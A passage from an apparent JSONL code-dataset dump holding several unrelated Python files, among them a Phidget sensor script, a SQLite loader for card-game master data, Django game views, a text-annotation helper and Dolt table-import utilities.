interfaceKit.closePhidget()\r\n except PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n print(\"Exiting....\")\r\n exit(1)\r\n print(\"Exiting....\")\r\n exit(1)\r\nelse:\r\n display_device_info()\r\n\r\nprint(\"Setting the data rate for each sensor index to 4ms....\")\r\nfor i in range(interfaceKit.getSensorCount()):\r\n try:\r\n \r\n interfaceKit.setDataRate(i, 4)\r\n except PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n\r\nprint(\"Press Enter to quit....\")\r\n\r\nchr = sys.stdin.read(1)\r\n\r\nprint(\"Closing...\")\r\n\r\ntry:\r\n interfaceKit.closePhidget()\r\nexcept PhidgetException as e:\r\n print(\"Phidget Exception %i: %s\" % (e.code, e.details))\r\n print(\"Exiting....\")\r\n exit(1)\r\n\r\nprint(\"Done.\")\r\nexit(0)\r\n","sub_path":"GreenAutomation/GreenSpy/InterfaceKit-simple.py","file_name":"InterfaceKit-simple.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"109728121","text":"import os\nimport sqlite3\nfrom collections import defaultdict\nfrom functools import lru_cache\nfrom typing import Iterable, Sequence\n\nfrom cachetools import LFUCache\n\nfrom . import dataclasses as D\nfrom .utils import construct_tt_from_sql_shape\nfrom .wave_description_base import LANGUAGE_DEFINITION_JA\n\n\nclass MasterData(object):\n def __init__(self, master_path):\n self.version = os.path.basename(master_path.rstrip(\"/\"))\n self.connection = sqlite3.connect(\n \"file:{0}?mode=ro\".format(os.path.join(master_path, \"masterdata.db\")), uri=True\n )\n self.connection.row_factory = sqlite3.Row\n self.card_id_cache = LFUCache(256)\n self.member_cache = {}\n\n self.ordinal_to_cid = {\n ord: id for ord, id in self.connection.execute(\"SELECT school_idol_no, id FROM m_card\")\n }\n self.tt_stat_increases = self.distill_tt_stat_increases()\n print(f\"MasterData: alloc with {len(self.ordinal_to_cid)} cards\")\n\n def distill_tt_stat_increases(self):\n rs = self.connection.execute(\n \"\"\"\n SELECT m_card.id AS demux, training_content_type, required_grade, SUM(value)\n FROM m_card\n LEFT JOIN m_training_tree ON (m_training_tree.id = m_card.training_tree_m_id)\n LEFT JOIN m_training_tree_card_param ON (m_training_tree.training_tree_card_param_m_id = m_training_tree_card_param.id)\n LEFT JOIN m_training_tree_mapping ON (m_training_tree.training_tree_mapping_m_id = m_training_tree_mapping.id)\n LEFT JOIN m_training_tree_cell_content ON (\n m_training_tree_mapping.training_tree_cell_content_m_id = m_training_tree_cell_content.id AND\n m_training_tree_cell_content.training_content_no = m_training_tree_card_param.training_content_no AND\n m_training_tree_cell_content.training_tree_cell_type == 2)\n GROUP BY demux, required_grade, training_content_type\n ORDER BY demux, required_grade\"\"\"\n )\n\n ret = defaultdict(lambda: defaultdict(lambda: {}))\n for cid, stat, grade, sum_value in rs:\n ret[cid][grade][stat] = sum_value\n\n return {k: self.cumulative_tt_offset(v) for k, v in ret.items()}\n\n def cumulative_tt_offset(self, levels):\n ls = []\n a = 0\n s = 0\n t = 0\n for k, v in sorted(levels.items()):\n a += v.get(3, 0)\n s += v.get(2, 0)\n t += v.get(4, 0)\n ls.append(D.CardLevelValues(k, a, s, t))\n return ls\n\n def lookup_member_by_id(self, member_id: int):\n if member_id in self.member_cache:\n return self.member_cache[member_id]\n\n da = self.connection.execute(\n \"\"\"\n SELECT m_member.id, member_group, m_member_unit.member_unit AS subunit, school_grade AS year, name,\n name_romaji, birth_month, birth_day, m_member.theme_dark_color,\n\n m_member_group.group_name, m_member_unit.unit_name,\n\n thumbnail_image_asset_path,\n standing_image_asset_path, autograph_image_asset_path,\n member_icon_image_asset_path FROM m_member\n LEFT JOIN m_member_group USING (member_group)\n LEFT JOIN m_member_unit_detail ON (m_member_unit_detail.member_m_id == m_member.id)\n LEFT JOIN m_member_unit ON (m_member_unit_detail.member_unit == m_member_unit.member_unit)\n WHERE m_member.id = ? LIMIT 1\n \"\"\",\n (member_id,),\n ).fetchone()\n\n if not da:\n return None\n\n m = D.Member(*da)\n\n da = self.connection.execute(\n \"\"\"\n SELECT id, school_idol_no, card_rarity_type, card_attribute,\n role, thumbnail_asset_path\n FROM m_card\n LEFT JOIN m_card_appearance ON (card_m_id = m_card.id AND appearance_type == 1)\n WHERE member_m_id = ? ORDER BY m_card.school_idol_no DESC\n \"\"\",\n (member_id,),\n )\n\n m.card_brief = [D.CardLite(*row[:5], D.CardAppearance(None, None, row[5])) for row in da]\n\n self.member_cache[member_id] = m\n return m\n\n def lookup_member_list(self, group: int = None, subunit: int = None):\n if group and subunit:\n where = \"WHERE member_group = :group AND m_member_unit.member_unit = :unit\"\n elif group:\n where = \"WHERE member_group = :group\"\n elif subunit:\n where = \"WHERE m_member_unit.member_unit = :unit\"\n else:\n where = \"\"\n\n ids = self.connection.execute(\n f\"\"\"\n SELECT m_member.id FROM m_member\n LEFT JOIN m_member_unit_detail ON (m_member_unit_detail.member_m_id == m_member.id)\n LEFT JOIN m_member_unit ON (m_member_unit_detail.member_unit == m_member_unit.member_unit)\n {where}\n ORDER BY member_group, m_member_unit.member_unit, m_member.id\"\"\",\n {\"unit\": subunit, \"group\": group},\n )\n\n return [self.lookup_member_by_id(i) for i, in ids]\n\n def do_not_use_get_all_card_briefs(self):\n da = self.connection.execute(\n \"\"\"SELECT id, school_idol_no, card_rarity_type, card_attribute,\n role, thumbnail_asset_path\n FROM m_card\n LEFT JOIN m_card_appearance ON (card_m_id = m_card.id AND appearance_type == 1)\n ORDER BY m_card.school_idol_no\"\"\"\n )\n\n return [D.CardLite(*row[:5], D.CardAppearance(None, None, row[5])) for row in da]\n\n def all_ordinals(self):\n return sorted(self.ordinal_to_cid.keys())\n\n def card_ordinals_to_ids(self, ordinals: Iterable[int]):\n return [self.ordinal_to_cid.get(o) for o in ordinals]\n\n def lookup_card_by_id(self, card_id: int, use_cache: bool = True):\n if card_id in self.card_id_cache:\n return self.card_id_cache[card_id]\n\n da = self.connection.execute(\n \"\"\"\n SELECT member_m_id, id, school_idol_no, card_rarity_type, max_level, card_attribute,\n role, training_tree_m_id, sp_point, exchange_item_id, max_passive_skill_slot,\n m_card_attribute.background_asset_path, 0, parameter2, parameter1, parameter3\n FROM m_card\n LEFT JOIN m_card_rarity USING (card_rarity_type)\n LEFT JOIN m_card_attribute USING (card_attribute)\n LEFT JOIN m_card_awaken_parameter ON (card_master_id == m_card.id)\n WHERE m_card.id = ? LIMIT 1\n \"\"\",\n (card_id,),\n ).fetchone()\n\n if not da:\n return None\n member_id, *da = da\n card = D.Card(*da[:11])\n card.member = self.lookup_member_by_id(member_id)\n card.active_skill = self.lookup_active_skill_by_card_id(card.id)\n card.passive_skills = self.lookup_passive_skills_by_card_id(card.id)\n card.idolized_offset = D.CardLevelValues(*da[11:])\n card.tt_offset = self.tt_stat_increases.get(card.id)\n card.role_effect = self.lookup_role_effect(card.role)\n\n if not card.tt_offset:\n card.tt_offset = D.CardLevelValues(0, 0, 0, 0)\n\n stats = self.connection.execute(\n \"\"\"SELECT level, appeal, stamina, technique FROM\n m_card_parameter WHERE card_m_id = ? ORDER BY level\n \"\"\",\n (card_id,),\n )\n card.stats = [D.CardLevelValues(*r) for r in stats]\n\n appearances = self.connection.execute(\n \"\"\"\n SELECT appearance_type, card_name, image_asset_path, thumbnail_asset_path FROM m_card_appearance\n WHERE card_m_id = ? ORDER BY appearance_type LIMIT 2\n \"\"\",\n (da[0],),\n ).fetchall()\n for type_, *row in appearances:\n if type_ == 1:\n card.normal_appearance = D.CardAppearance(*row)\n if type_ == 2:\n card.idolized_appearance = D.CardAppearance(*row)\n\n if use_cache:\n self.card_id_cache[card.id] = card\n\n return card\n\n def lookup_multiple_cards_by_id(self, idset: Sequence[int]):\n if len(idset) >= 192:\n cache = False\n else:\n cache = True\n\n return [self.lookup_card_by_id(i, cache) for i in idset]\n\n def lookup_active_skill_by_card_id(self, card_id: int):\n ROOT_COUNT = 8\n\n da = self.connection.execute(\n \"\"\"\n SELECT skill_target_master_id1, m_active_skill.id, m_active_skill.name, m_active_skill.description,\n skill_type, trigger_probability, sp_gauge_point,\n m_active_skill.icon_asset_path, m_active_skill.thumbnail_asset_path,\n m_skill_effect.* FROM m_card_active_skill\n LEFT JOIN m_active_skill ON (active_skill_master_id == m_active_skill.id)\n LEFT JOIN m_skill ON (m_active_skill.skill_master_id == m_skill.id)\n LEFT JOIN m_skill_effect ON (m_skill.skill_effect_master_id1 == m_skill_effect.id)\n WHERE m_card_active_skill.card_master_id = ? ORDER BY skill_level\n \"\"\",\n (card_id,),\n )\n\n root = da.fetchone()\n if not root:\n return None\n\n target_id, *root = root\n skill = D.ActiveSkill(*root[:ROOT_COUNT])\n skill.levels = [root[ROOT_COUNT:]]\n for _, *level in da:\n skill.levels.append(level[ROOT_COUNT:])\n\n skill.target = self.lookup_skill_target_type(target_id)\n return skill\n\n def lookup_passive_skills_by_card_id(self, card_id: int):\n ROOT_COUNT = 10\n\n da = self.connection.execute(\n \"\"\"\n SELECT skill_target_master_id1, m_card_passive_skill_original.position,\n m_passive_skill.id, m_passive_skill.name, m_passive_skill.description,\n rarity, trigger_type, trigger_probability,\n m_passive_skill.icon_asset_path, m_passive_skill.thumbnail_asset_path,\n condition_type, condition_value,\n m_skill_effect.* FROM m_card_passive_skill_original\n LEFT JOIN m_passive_skill ON (passive_skill_master_id == m_passive_skill.id)\n LEFT JOIN m_skill ON (m_passive_skill.skill_master_id == m_skill.id)\n LEFT JOIN m_skill_condition ON (m_passive_skill.skill_condition_master_id1 == m_skill_condition.id)\n LEFT JOIN m_skill_effect ON (m_skill.skill_effect_master_id1 == m_skill_effect.id)\n WHERE m_card_passive_skill_original.card_master_id = ? ORDER BY position, skill_level\n \"\"\",\n (card_id,),\n )\n\n skills = []\n c_demux_key = None\n c_skill = None\n for target_id, demux_key, *actual in da:\n if demux_key != c_demux_key:\n if c_skill:\n skills.append(c_skill)\n c_skill = D.PassiveSkill(*actual[:ROOT_COUNT])\n c_skill.target = self.lookup_skill_target_type(target_id)\n c_skill.levels = []\n c_demux_key = demux_key\n c_skill.levels.append(actual[ROOT_COUNT:])\n\n if c_skill:\n skills.append(c_skill)\n\n return skills\n\n def lookup_song_list(self):\n da = self.connection.execute(\n \"\"\"\n SELECT live_id, name, member_group, member_unit, jacket_asset_path,\n m_member_group.group_name, m_member_unit.unit_name,\n m_live.display_order FROM m_live\n LEFT JOIN m_member_group USING (member_group)\n LEFT JOIN m_member_unit USING (member_unit)\n ORDER BY m_live.display_order\"\"\"\n )\n\n return [D.Live(*row) for row in da]\n\n def lookup_song_difficulties(self, for_song_id: int):\n da = self.connection.execute(\n \"\"\"\n SELECT name, member_group, member_unit, jacket_asset_path,\n m_member_group.group_name, m_member_unit.unit_name,\n m_live.display_order FROM m_live\n LEFT JOIN m_member_group USING (member_group)\n LEFT JOIN m_member_unit USING (member_unit)\n WHERE live_id = ? LIMIT 1\"\"\",\n (for_song_id,),\n )\n\n root = D.Live(for_song_id, *da.fetchone())\n da.close()\n\n da = self.connection.execute(\n \"\"\"\n SELECT live_difficulty_id,\n live_difficulty_type,\n evaluation_s_score,\n evaluation_a_score,\n evaluation_b_score,\n evaluation_c_score\n FROM m_live_difficulty\n WHERE m_live_difficulty.live_id = ?\n ORDER BY live_difficulty_type\"\"\",\n (for_song_id,),\n )\n\n diffs = []\n for row in da:\n the_diff = D.LiveDifficulty(*row)\n the_diff.stage_gimmicks = self.lookup_gimmicks_by_live_diff_id(the_diff.id)\n the_diff.note_gimmicks = self.lookup_note_gimmicks_by_live_diff_id(the_diff.id)\n the_diff.wave_missions = self.lookup_wave_descriptions_for_live_id(the_diff.id)\n diffs.append(the_diff)\n root.difficulties = diffs\n return root\n\n def lookup_note_gimmicks_by_live_diff_id(self, live_diff_id: int):\n ROOT_COUNT = 9\n\n da = self.connection.execute(\n \"\"\"\n SELECT skill_target_master_id1,\n COUNT(0),\n m_live_difficulty_note_gimmick.name,\n m_live_difficulty_note_gimmick.description,\n 0, 10000, 0, 0,\n NULL, NULL,\n m_skill_effect.* FROM m_live_difficulty_note_gimmick\n\n LEFT JOIN m_skill ON (m_live_difficulty_note_gimmick.skill_master_id == m_skill.id)\n LEFT JOIN m_skill_effect ON (m_skill.skill_effect_master_id1 == m_skill_effect.id)\n WHERE m_live_difficulty_note_gimmick.live_difficulty_id = ?\n GROUP BY skill_master_id\n \"\"\",\n (live_diff_id,),\n )\n\n skills = []\n for target_id, *actual in da:\n c_skill = D.ActiveSkill(*actual[:ROOT_COUNT])\n c_skill.target = self.lookup_skill_target_type(target_id)\n c_skill.levels = [actual[ROOT_COUNT:]]\n skills.append(c_skill)\n\n return skills\n\n def lookup_gimmicks_by_live_diff_id(self, live_diff_id: int):\n ROOT_COUNT = 10\n\n da = self.connection.execute(\n \"\"\"\n SELECT skill_target_master_id1,\n m_live_difficulty_gimmick.id,\n m_live_difficulty_gimmick.name,\n m_live_difficulty_gimmick.description,\n 0, trigger_type, 10000, NULL, NULL,\n condition_type, condition_value,\n m_skill_effect.* FROM m_live_difficulty_gimmick\n\n LEFT JOIN m_skill ON (m_live_difficulty_gimmick.skill_master_id == m_skill.id)\n LEFT JOIN m_skill_condition ON (m_live_difficulty_gimmick.condition_master_id1 == m_skill_condition.id)\n LEFT JOIN m_skill_effect ON (m_skill.skill_effect_master_id1 == m_skill_effect.id)\n WHERE m_live_difficulty_gimmick.live_difficulty_master_id = ?\n \"\"\",\n (live_diff_id,),\n )\n\n skills = []\n for target_id, *actual in da:\n c_skill = D.PassiveSkill(*actual[:ROOT_COUNT])\n c_skill.target = self.lookup_skill_target_type(target_id)\n c_skill.levels = [actual[ROOT_COUNT:]]\n skills.append(c_skill)\n\n return skills\n\n def lookup_wave_descriptions_for_live_id(self, live_diff_id: int):\n da = self.connection.execute(\n \"\"\"SELECT wave_id, name, description\n FROM m_live_note_wave_gimmick_group\n WHERE live_difficulty_id = ?\n ORDER BY wave_id\"\"\",\n (live_diff_id,),\n )\n return [D.LiveWaveMission(*x, LANGUAGE_DEFINITION_JA) for x in da.fetchall()]\n\n def lookup_all_accessory_skills(self):\n da = self.connection.execute(\n \"\"\"\n SELECT skill_target_master_id1, m_accessory_passive_skill.id,\n name, description, rarity, trigger_type, probability_at_level_min,\n m_accessory_passive_skill.icon_asset_path, m_accessory_passive_skill.thumbnail_asset_path,\n condition_type, condition_value,\n m_skill_effect.* FROM m_accessory_passive_skill\n LEFT JOIN m_accessory_passive_skill_level ON\n (m_accessory_passive_skill_level.accessory_passive_skill_master_id\n == m_accessory_passive_skill.id AND skill_level == 1)\n LEFT JOIN m_skill ON (m_accessory_passive_skill.skill_master_id == m_skill.id)\n LEFT JOIN m_skill_condition ON (m_accessory_passive_skill.skill_condition_master_id1 == m_skill_condition.id)\n LEFT JOIN m_skill_effect ON (m_skill.skill_effect_master_id1 == m_skill_effect.id)\n ORDER BY m_accessory_passive_skill.id\n \"\"\"\n )\n\n skills = []\n for target_id, *row in da:\n skill = D.PassiveSkill(*row[:10])\n skill.levels = [row[10:]]\n skill.target = self.lookup_skill_target_type(target_id)\n skills.append(skill)\n\n return skills\n\n def lookup_all_hirameku_skills(self):\n da = self.connection.execute(\n \"\"\"\n SELECT skill_target_master_id1, m_passive_skill.id,\n name, description, rarity, trigger_type, trigger_probability,\n m_passive_skill.icon_asset_path, m_passive_skill.thumbnail_asset_path,\n condition_type, condition_value,\n m_skill_effect.* FROM m_passive_skill\n LEFT JOIN m_skill ON (m_passive_skill.skill_master_id == m_skill.id)\n LEFT JOIN m_skill_condition ON (m_passive_skill.skill_condition_master_id1 == m_skill_condition.id)\n LEFT JOIN m_skill_effect ON (m_skill.skill_effect_master_id1 == m_skill_effect.id)\n WHERE m_passive_skill.id > 30000000\n ORDER BY m_passive_skill.id\n \"\"\"\n ).fetchall()\n\n skills = []\n for target_id, *row in da:\n skill = D.PassiveSkill(*row[:10])\n skill.levels = [row[10:]]\n skill.target = self.lookup_skill_target_type(target_id)\n skills.append(skill)\n\n return skills\n\n @lru_cache(4)\n def lookup_role_effect(self, role_id):\n da = self.connection.execute(\n \"\"\"\n SELECT * FROM m_card_role_effect WHERE id = ?\n \"\"\",\n (role_id,),\n ).fetchone()\n\n if not da:\n return None\n\n return D.CardRoleEffect(*da[1:])\n\n @lru_cache(maxsize=None)\n def lookup_skill_target_type(self, stid):\n basic = self.connection.execute(\n \"SELECT * FROM m_skill_target WHERE id = ? LIMIT 1\", (stid,)\n ).fetchone()\n if not basic:\n return None\n\n target_type = D.SkillTargetType(\n basic[\"id\"],\n basic[\"only_owner\"],\n basic[\"excluding_owner\"],\n basic[\"random_choose_count\"],\n basic[\"checking_owner_party\"],\n basic[\"checking_owner_school\"],\n basic[\"checking_owner_grade\"],\n basic[\"checking_owner_unit\"],\n basic[\"checking_owner_attribute\"],\n basic[\"checking_owner_role\"],\n )\n\n if basic[\"target_attribute_group_id\"]:\n group = self.connection.execute(\n \"\"\"SELECT attribute FROM m_skill_target_attribute_group\n WHERE group_id = ?\"\"\",\n (basic[\"target_attribute_group_id\"],),\n ).fetchall()\n target_type.fixed_attributes = [x[0] for x in group]\n if basic[\"target_member_group_id\"]:\n group = self.connection.execute(\n \"\"\"SELECT member_maseter_id FROM m_skill_target_member_group\n WHERE group_id = ? LIMIT 1\"\"\",\n (basic[\"target_member_group_id\"],),\n ).fetchall()\n target_type.fixed_members = [x[0] for x in group]\n if basic[\"target_unit_group_id\"]:\n group = self.connection.execute(\n \"\"\"SELECT member_unit FROM m_skill_target_unit_group\n WHERE group_id = ? LIMIT 1\"\"\",\n (basic[\"target_unit_group_id\"],),\n ).fetchall()\n target_type.fixed_subunits = [x[0] for x in group]\n if basic[\"target_school_group_id\"]:\n group = self.connection.execute(\n \"\"\"SELECT member_group FROM m_skill_target_school_group\n WHERE group_id = ? LIMIT 1\"\"\",\n (basic[\"target_school_group_id\"],),\n ).fetchall()\n target_type.fixed_schools = [x[0] for x in group]\n if basic[\"target_school_grade_group_id\"]:\n group = self.connection.execute(\n \"\"\"SELECT grade FROM m_skill_target_school_grade_group\n WHERE group_id = ? LIMIT 1\"\"\",\n (basic[\"target_school_grade_group_id\"],),\n ).fetchall()\n target_type.fixed_years = [x[0] for x in group]\n if basic[\"target_role_group_id\"]:\n group = self.connection.execute(\n \"\"\"SELECT role FROM m_skill_target_cardrole_group\n WHERE group_id = ? LIMIT 1\"\"\",\n (basic[\"target_role_group_id\"],),\n ).fetchall()\n target_type.fixed_roles = [x[0] for x in group]\n return target_type\n\n def lookup_batch_item_req_set(self, item_set_ids: Iterable[int]):\n id_list = \",\".join(str(int(x)) for x in set(item_set_ids))\n\n rows = self.connection.execute(\n f\"\"\"\n SELECT m_training_tree_cell_item_set.id, content_type, content_id,\n content_amount, thumbnail_asset_path, display_order\n FROM m_training_tree_cell_item_set\n LEFT JOIN m_training_material ON\n (content_type == 12 AND content_id == m_training_material.id)\n WHERE m_training_tree_cell_item_set.id IN ({id_list})\n ORDER BY m_training_tree_cell_item_set.id\"\"\"\n )\n\n items = {}\n struct = defaultdict(lambda: defaultdict())\n for (\n group,\n content_type,\n content_id,\n content_amount,\n thumbnail_asset_path,\n display_order,\n ) in rows:\n if content_type == 12:\n items[str(content_id)] = (thumbnail_asset_path, display_order)\n struct[group][str(content_id)] = content_amount\n else:\n struct[group][\"_gold\"] = content_amount\n return {\"items\": items, \"sets\": struct}\n\n def lookup_tt(self, ttid):\n tree = self.connection.execute(\n \"\"\"\n SELECT training_tree_cell_content_m_id, training_tree_design_m_id, training_tree_card_param_m_id\n FROM m_training_tree\n LEFT JOIN m_training_tree_mapping ON (training_tree_mapping_m_id = m_training_tree_mapping.id)\n WHERE m_training_tree.id = ? LIMIT 1\"\"\",\n (ttid,),\n ).fetchone()\n if not tree:\n return None\n\n content_track_id, shape_id, card_params = tree\n # We only care about stat increases for now...\n entries = self.connection.execute(\n \"\"\"SELECT m_training_tree_design.cell_id, parent_cell_id,\n parent_branch_type,\n training_tree_cell_type, required_grade,\n training_content_type, value,\n training_tree_cell_item_set_m_id\n FROM m_training_tree_design\n LEFT JOIN m_training_tree_cell_content ON\n (m_training_tree_design.cell_id = m_training_tree_cell_content.cell_id\n AND m_training_tree_cell_content.id = ?)\n LEFT JOIN m_training_tree_card_param ON\n (m_training_tree_card_param.training_content_no = m_training_tree_cell_content.training_content_no\n AND training_tree_cell_type = 2\n AND m_training_tree_card_param.id = ?)\n WHERE m_training_tree_design.id = ? ORDER BY m_training_tree_design.cell_id\"\"\",\n (content_track_id, card_params, shape_id),\n ).fetchall()\n\n if entries:\n item_sets = self.lookup_batch_item_req_set(e[-1] for e in entries if e)\n return (item_sets, *construct_tt_from_sql_shape(entries))\n\n return None\n\n def lookup_inline_image(self, iip):\n path = self.connection.execute(\n \"\"\"SELECT path FROM m_inline_image WHERE id=?\"\"\", (iip,)\n ).fetchone()\n if path:\n return path[0]\n # ???\n path = self.connection.execute(\n \"\"\"SELECT path FROM m_decoration_texture WHERE id=?\"\"\", (iip,)\n ).fetchone()\n if path:\n return path[0]\n\n return None\n","sub_path":"libcard2/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":24209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"414549190","text":"\n\n\nclass Animal():\n fierce = True\n\n # 类型”、“体型”、“性格”、“是否属于凶猛动物”四个属性\n def __init__(self,type,body_type,character):\n self.type = type\n self.body_type = body_type\n self.character = character\n self.set_fierce()\n def set_fierce(self):\n spec_type = ['中','大']\n if self.body_type in spec_type and self.type == \"食肉\":\n self.fierce = True\n else:\n self.fierce = False\n\nclass Cat(Animal):\n cry = \"喵喵喵....\"\n # 增加继承的属性\n def __init__(self,name,type,body_type,character,is_pet=True):\n self.name = name\n self.is_pet = is_pet\n super(Cat,self).__init__(type,body_type,character)\n\n pass\n\nclass Zoo():\n _animals_list = []\n def __init__(self,name):\n self.name = name\n\n def add_animal(self,animal):\n\n if animal not in self._animals_list:\n self._animals_list.append(animal)\n else:\n print(\"{}已经存在{}动物园\".format(animal,self.name))\n\n def showAnimals(self):\n # print(self._animals_list)\n return self._animals_list\n\n\n\nif __name__ == '__main__':\n # 实例化动物园\n z = Zoo('时间动物园')\n # 实例化一只猫,属性包括名字、类型、体型、性格\n cat1 = Cat('大花猫 1', '食肉', '小', '温顺')\n\n # 增加一只猫到动物园\n z.add_animal(cat1)\n # 动物园是否有猫这种动物\n have_cat = getattr(z,'cat1')\n\n print(have_cat)\n\n","sub_path":"week07/task/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"547064889","text":"window_width = 12\nacoustics_dim = [window_width, 80, 3]\nnovelty_dim = 10\nhomo_dim = 80\ndura_dim = 1\nZDIM = 128\naction_dim = 1\nsteps = 700\nbatch_size = 128\nnb_epoch = 100\n","sub_path":"constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"74369263","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom .forms import GameForm\nfrom .models import Game\n\n@login_required\ndef list_view(request):\n user = request.user\n form = GameForm(request.POST or None)\n\n if(request.method == \"POST\"):\n if(form.is_valid()):\n cleaned = form.cleaned_data\n title = cleaned['title']\n min_buy_in = cleaned['min_buy_in']\n max_buy_in = cleaned['max_buy_in']\n currency = cleaned['currency']\n game = Game (\n title=title,\n min_buy_in=min_buy_in,\n max_buy_in=max_buy_in,\n currency=currency,\n user=user,\n )\n\n game.save()\n form = GameForm()\n messages.success(request, \"Game {0} successfully added\".format(game))\n\n games = (Game.objects.filter(public=True) | Game.objects.filter(user=user)).filter(deleted=False)\n context = {\n 'games': games,\n 'form': form,\n }\n return render(request, 'games/list.html', context)\n\n@login_required\ndef delete(request, pk):\n user = request.user\n\n game = Game.objects.get(pk=pk)\n\n if(game.user.id != user.id):\n messages.error(request, \"Unable to delete {0}. Not the user for this game.\".format(game))\n return redirect('games:list')\n\n game.deleted = True\n\n game.save()\n\n messages.success(request, \"Game {0} successfully deleted\".format(game))\n return redirect('games:list')\n","sub_path":"games/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"246267735","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport pandas as pd\n\nfile_name = 'data1.xlsx' \ndf = pd.read_excel(file_name)[['text', 'suicidal_ideation']]\n\n\nfor index, row in df.iterrows():\n X = row['text']\n Y = row['suicidal_ideation']\n print('*'*100)\n print(\"Text #: \", index)\n print(\"Could the following text indicate the want to commit suicide?\")\n print(X)\n check = True\n while(check):\n ans = input(\"Please enter y for YES or n for NO: \").lower()\n if ans == \"yes\" or ans =='y':\n df[\"suicidal_ideation\"][index] = 1\n check = False\n elif ans == \"no\" or ans =='n':\n df[\"suicidal_ideation\"][index] = 0\n check = False\n else:\n print(\"!!!!Invalid input!!!!\")\n break\n\n\ndf.to_csv('annotated_data1.csv', index=False)","sub_path":"archive/research/suicidal_ideation_annotator_helper/self_annotator1.py","file_name":"self_annotator1.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"308592390","text":"from typing import List, Callable, Any, Mapping\nimport pandas as pd\nfrom doltpy.core.dolt import Dolt, DEFAULT_HOST, DEFAULT_PORT\nimport logging\nimport io\nimport tempfile\nfrom datetime import datetime\nfrom sqlalchemy import String, DateTime, Integer, Float, Table, MetaData, Column\nimport math\n\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_BATCH_SIZE = 300000\nCREATE, FORCE_CREATE, REPLACE, UPDATE = 'create', 'force_create', 'replace', 'update'\nIMPORT_MODES_TO_FLAGS = {CREATE: ['-c'],\n FORCE_CREATE: ['-f', '-c'],\n REPLACE: ['-r'],\n UPDATE: ['-u']}\n\n\ndef import_df(repo: Dolt,\n table_name: str,\n data: pd.DataFrame,\n primary_keys: List[str],\n import_mode: str = None):\n \"\"\"\n Imports the given DataFrame object to the specified table, dropping records that are duplicates on primary key\n (in order, preserving the first record, something we might want to allow the user to sepcify), subject to\n given import mode. Import mode defaults to CREATE if the table does not exist, and UPDATE otherwise.\n :param repo:\n :param table_name:\n :param data:\n :param primary_keys:\n :param import_mode:\n :return:\n \"\"\"\n def writer(filepath: str):\n clean = data.dropna(subset=primary_keys)\n clean.to_csv(filepath, index=False)\n\n _import_helper(repo, table_name, writer, primary_keys, import_mode)\n\n\ndef bulk_import(repo: Dolt,\n table_name: str,\n data: io.StringIO,\n primary_keys: List[str],\n import_mode: str = None) -> None:\n \"\"\"\n This takes a file like object representing a CSV and imports it to the table specified. Note that you must\n specify the primary key, and the import mode. The import mode is one of the keys of IMPORT_MODES_TO_FLAGS.\n Choosing the wrong import mode will throw an error, for example `CREATE` on an existing table. Import mode\n defaults to CREATE if the table does not exist, and UPDATE otherwise.\n :param repo:\n :param table_name:\n :param data:\n :param primary_keys:\n :param import_mode:\n :return:\n \"\"\"\n def writer(filepath: str):\n with open(filepath, 'w') as f:\n f.writelines(data.readlines())\n\n _import_helper(repo, table_name, writer, primary_keys, import_mode)\n\n\ndef _import_helper(repo: Dolt,\n table_name: str,\n write_import_file: Callable[[str], None],\n primary_keys: List[str],\n import_mode: str) -> None:\n import_modes = IMPORT_MODES_TO_FLAGS.keys()\n if import_mode is not None:\n assert import_mode in import_modes, 'update_mode must be one of: {}'.format(import_modes)\n else:\n if table_name in [table.name for table in repo.ls()]:\n logger.info('No import mode specified, table exists, using \"{}\"'.format(UPDATE))\n import_mode = UPDATE\n else:\n logger.info('No import mode specified, table exists, using \"{}\"'.format(CREATE))\n import_mode = CREATE\n\n import_flags = IMPORT_MODES_TO_FLAGS[import_mode]\n logger.info('Importing to table {} in dolt directory located in {}, import mode {}'.format(table_name,\n repo.repo_dir(),\n import_mode))\n fp = tempfile.NamedTemporaryFile(suffix='.csv')\n write_import_file(fp.name)\n args = ['table', 'import', table_name, '--pk={}'.format(','.join(primary_keys))] + import_flags\n repo.execute(args + [fp.name])\n\n\ndef import_dict(repo: Dolt,\n table_name: str,\n data: Mapping[str, List[Any]],\n primary_keys: List[str] = None,\n import_mode: str = None,\n batch_size: int = DEFAULT_BATCH_SIZE):\n \"\"\"\n Provides a column major interface for writing Python data structures to Dolt, specifically data should be a dict\n where the keys are column names and the values are equal length lists of values to be written to Dolt. The lists\n must consist of:\n - values that match the type of the table in the schema of the table being written to\n - values of the same type that can be coalesced to a Python type by the (very limited) type inference logic\n for generating a schema from a data structure\n\n Note it is necessary for all list to be of the same length since we must coalesce the lists into rows, and that\n doesn't really make sense when the lists are not of the same length.\n\n Let's proceed with the example of creating a simple table and showing how to write some data structures:\n CREATE TABLE players (id INT, name VARCHAR(16), PRIMARY KEY (id))\n\n Now write in update mode:\n >>> dict_of_lists = {'id': [1, 2], 'name': ['Roger', 'Rafael']}\n >>> import_dict(repo, 'players', dict_of_lists, import_mode='update')\n\n Alternatively we can let the Python code infer a schema:\n >>> import_dict(repo, 'players', dict_of_lists, ['id'], import_mode='create')\n\n Assertions:\n - all list values are of equal length\n - when inferring a schema each list value has elements of a type that can be mapped to a SQL type, the logic is\n currently very limited\n - when inferring a schema\n\n This function requires the Dolt SQL server to be running on the host and port provided, defaulting 